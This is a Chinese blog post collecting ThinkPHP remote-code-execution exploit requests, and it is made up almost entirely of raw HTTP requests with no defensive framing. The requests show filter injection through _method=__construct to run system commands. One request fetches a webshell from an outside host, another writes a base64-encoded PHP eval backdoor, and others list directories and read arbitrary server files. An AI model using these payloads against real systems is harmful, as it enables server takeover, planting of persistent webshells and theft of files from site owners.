thinkphp payload

作者: print("") 分类: 未分类 发布时间: 2019-12-02 16:59
POST /index.php?s=captcha&&Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1
Host: aaa.kkt99.top
Content-Length: 76
Cache-Control: max-age=0
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=15c58ldpm65a12094fik2aul60; UM_distinctid=16ec5c84963499-0179aed780904e-2393f61-384000-16ec5c8496494d; CNZZDATA1271205468=1873186741-1575275639-%7C1575275639
Connection: close

_method=__construct&filter=assert&method=GET&server%5BREQUEST_METHOD%5D=Fuck

_method=construct&filter[]=assert&filter[]=file_put_contents('0.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWyczNjB2ZXJ5J107ZXZhbCgkcGFzcyk7Pz4='))&server=-1

_method=__construct&filter[]=system&method=GET&get[]=whoami

_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo 
or
_method=__construct&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo

PHP 7.4 Getshell

POST /%3f><%3fphp%20eval($_GET[1]);%3f>/controller/Index.php?1=phpinfo(); HTTP/1.1
Host: 192.168.0.103:8181
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

_method=__construct&method=GET&server[]=1&filter[]=think\Build::module&get[]=index//../../public//?><?php eval($_GET[1]);?>

列目标

POST /index.php?s=captcha&&Fuck=12312 HTTP/1.1
Host: 192.168.0.103:8181
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 102

_method=__construct&filter[]=scandir&filter[]=var_dump&method=GET&get[]=/www/wwwroot/adada.com/public/

PHP 7.4 任意文件读取

POST /index.php?s=captcha&&Fuck=12312 HTTP/1.1
Host: 192.168.0.103:8181
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

_method=__construct&filter[]=highlight_file&method=GET&get[]=/www/wwwroot/adada.com/public/index.php

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注